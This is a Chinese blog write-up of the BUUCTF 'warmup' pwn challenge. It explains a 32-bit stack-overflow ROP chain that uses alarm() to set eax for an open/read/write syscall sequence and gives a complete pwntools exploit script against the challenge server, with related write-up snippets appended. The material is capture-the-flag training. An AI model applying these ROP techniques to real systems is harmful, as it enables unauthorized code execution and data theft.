warmup【buuctf-pwn】

最新推荐文章于 2025-03-14 16:35:47 发布
最新推荐文章于 2025-03-14 16:35:47 发布
阅读量324 收藏 1
点赞数 1
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_73756460/article/details/131766500
版权

warmup【buuctf-pwn】

这是我目前遇到过的一道很有意思的栈题 利用了alram函数来修改我们的eax的值

此题告诉我们当我们需要修改eax时我们的目光可以不仅仅局限于gadget 也可以通过其他函数来达成同样的效果

惯例我们先来checksec一下 仅开启了NX保护的32位程序

请添加图片描述

我们放进ida里看看

可以看到在函数开头我们这里有一个alarm函数这里首先让我们来介绍一下alarm函数的特点

当程序已经运行了一个alarm函数时 此时我们再次执行另一个alarm函数 就会返回第一个alarm函数所设定的时间将去已经经过的时间

请添加图片描述

点进vuln函数

我们可以发现此处存在一个栈溢出 但是由于我们开启了NX保护 并且长度也不够 因此无法通过ret2shellcode的方法达成目的

此处我们需要注意的点是由于该函数开头并没有push ebp因此offset的大小为0x20 不用加上ebp的长度

请添加图片描述

审题结束 开始解题

题目提供给我们了systemcall函数因此我们考虑使用系统调用号来达成目的

由于我们无法执行execve(11,0,0)

因为我们想要执行该函数的时候无法保证后两个参数皆为0

那么我们就考虑使用orw来执行

那么我们该如何执行open函数呢 open函数的调用号为5 因此我们考虑使用alarm函数将eax赋值为5

sleep(5)
payload = b'a'*0x20 + p32(alarm) + p32(syscall) + p32(vuln) + p32(data_addr) + p32(0)
io.send(payload)

接下来就简单了 我们直接调用read 和write函数达成orw 将flag写到data段上也有可读可写

最终成功获取到flag

exp:

from pwn import *
#io = process('./warmup' )
context.log_level="debug"
io = remote( 'node4.buuoj.cn', 28313)
alarm = 0x804810d
vuln = 0x804815a 
write_addr = 0x8048135
data_addr = 0x80491bc
syscall = 0x804813a
read_addr = 0x804811d

payload = b'a'*0x20 + p32(read_addr) + p32(vuln) + p32(0) + p32(data_addr) + p32(0x10)
io.send(payload)
io.recvuntil('Good Luck!\n')
io.send(b'flag\x00\n' )
sleep(5)
payload = b'a'*0x20 + p32(alarm) + p32(syscall) + p32(vuln) + p32(data_addr) + p32(0)
io.send(payload)
io.recvuntil('Good Luck!\n')
payload = b'a'*0x20 + p32(read_addr) + p32(vuln) + p32(3) + p32(data_addr) + p32 (0x40)
io.send(payload )
io.recvuntil('Good Luck!\n')
payload=b'a'*0x20 + p32(write_addr) + p32(vuln) + p32(1) + p32(data_addr) + p32 (0x40)
io.send(payload)
io.interactive()

参考 穿林打叶声吧师傅的b站视频 PWN buuctf刷题 - warmup_哔哩哔哩_bilibili

BUUCTF - PWNwarmup_csaw_2016
古月浪子的博客
03-19 3364
checksec一下,发现啥保护也没开 IDA打开看看,又是明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.s...
BUUCTF--[V&N2020 公开赛]warmup
A13837377363的博客
05-30 351
在不指定rsi的情况,open会直接将rsi里面的值作为flag值,而rsi里面有时候存着地址,是一个极大值,可能会引起一些意想不到的问题。例如这题中,执行rop的时候rsi存着的是buf的地址,是一个极大值,一开始我没有pop rsi为0,导致执行了好几遍都没法orw成功,加上了pop rsi 0才成功读出flag。有沙盒,分析了一下,write的count不等于0x10就可以,0x30什么的都可以。怎么办呢,细心的小伙伴会发现我们知道libc的基址,那可以写在libc的bss上面啊。
buuctf--pwn-warmup
weixin_45427676的博客
09-19 578
下载文件后首先查看保护机制,checksec发现没有开什么保护,64位程序,在IDA中打开查看程序流程 gets()函数很明显会有栈溢出漏洞,然后发现有后门函数,也就是sub_40060D函数,而且会发现你执行此程序的时候可以直接输出后门函数的地址,就不需要再找他的地址了 sprintf(&s, "%p\n", sub_40060D) 这个函数的意思就是将sub_40060D的地址放在s缓冲区中输出地址,所以执行的时候就可以直接看到后门函数地址。 所以现在的漏洞利用思路就是将v5缓冲区覆盖
BUUctf warmup_csaw_2016
最新发布
A_fish_like_sing的博客
03-14 330
buu ctf pwn warmup_csaw_2016
buuctfWarmUp
qq_38634097的博客
04-17 742
通过代码审计,我们知道了需要满足三个条件,前两个为file不为空且为字符串,那么可以构造pyload为:?file=hint.php.(我们已经知道source.php文件源码是什么了,所以直接用hint.php即可)我们已知,hint.php在白名单,flag在ffffllllaaaagggg,mb_strpos($page . '?结合已知条件,再次进行代码审计,寻找突破口。开题一张笑脸,无他,查看网页源码,看到提示source.php,在url后加/source.php,打开结果如下,
[BUUCTF]PWN——[V&N2020 公开赛]warmup
mcmuyanga的博客
11-17 535
[V&N2020 公开赛]warmup 步骤: 例行检查,64位程序,除了canary,其他保护都开 本地运行一下,看看大概的情况 64位ida载入,从main函数开始看程序 看到程序将puts函数的地址泄露给了我们 sub_84D()函数里面是prctl函数的沙箱机制 可以利用seccomp-tools工具来查看一下限制了哪些函数 禁止了execve和fork syscall, 关于seccomp-tools工具的安装和使用看这篇文章,关于prctl函数可以看一下这篇文章
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 445
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1562
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
BUUCTF-PWN刷题记录-4
weixin_44145820的博客
04-10 1163
目录hitcontraining_secretgarden hitcontraining_secretgarden 这题需要使用double free size字段的高四位可以不为0
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1544
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
BUUCTF|PWN-warmup_csaw_2016-WP
l2645470582_的博客
07-28 548
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec warmup_csaw_2016 3、我们看到该文件是64位的文件,我们用64位IDA打开该文件 3.1、shift+f12查看该文件的关键字符串 3.2、双击关键字符串,f5进入反编译代码区 查看main函数 3.3、我们看到s和v5字符数组,查看他们所占字节 v5有溢出: r(返回地址): 关键字符串函数地址 4、编译代码 #i...
buuctf warmup
doudoudedi
01-28 612
函数很少我们需要控制寄存器的值来执行内核调用(int 80) 思路 先将字符串/bin/sh写入程序32位的程序用栈传递参数所以我们有充足的空间进行ROP然后跳回程序开始然后将再次读入/bin/sh然后控制好寄存器的值即打开execve的系统调用(这里函数最后的ret会使栈向上提了4个byte所以寄存器控制好了)~~ exp: #!/usr/bin/python2 from pwn import ...
BUUCTF-WarmUp
硫酸超的博客
11-20 5249
BUUCTF-WarmUp(代码审计) 1、打开靶场后,查看源码即可看到 <!--source.php--> 2、进入sourcep.php 代码如下 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.ph
BUUCTF——Warmup
weixin_44866139的博客
04-30 1475
Warmup <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint....
buuctf-WarmUp
xixihahawuwu的博客
11-23 436
首先我们先看下题目给的提示 Php 代码审计 注意,一般题目给出这样的题解,就已经相当于明确的告诉你,flag线索在网页源码里 而我们只要使用f12快捷键,就可以查看网页源码 进入环境,我们可以看到只有一张图片,根据我们的思路,查看页面源码 好,线索已经出来了 我们来访问一下 在新的页面下返回了一段php源码 审计一下 在这段源码里有几个醒目的地方就是php逻辑运算符 &&逻辑与 ||逻辑或 要求我们的file变量不为空 我们来看看这段代码首先要求我们传进去的得是字符串类型 而.
buuctf——Warmup
qq_51796436的博客
03-05 1268
打开题目F12有注释source.php 那访问网址:题目/source.php出现如下题目代码:
buuctf [V&N2020 公开赛]warmup
qq_42728977的博客
04-14 508
禁了exceve,只能用open》read》puts了 参考链接 https://www.cnblogs.com/luoleqi/p/12468271.html http://www.starssgo.top/2020/03/04/%C2%96%C2%96%C2%96%C2%96-V-N2020-%E5%85%AC%E5%BC%80%E8%B5%9B-pwn/#warmup ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值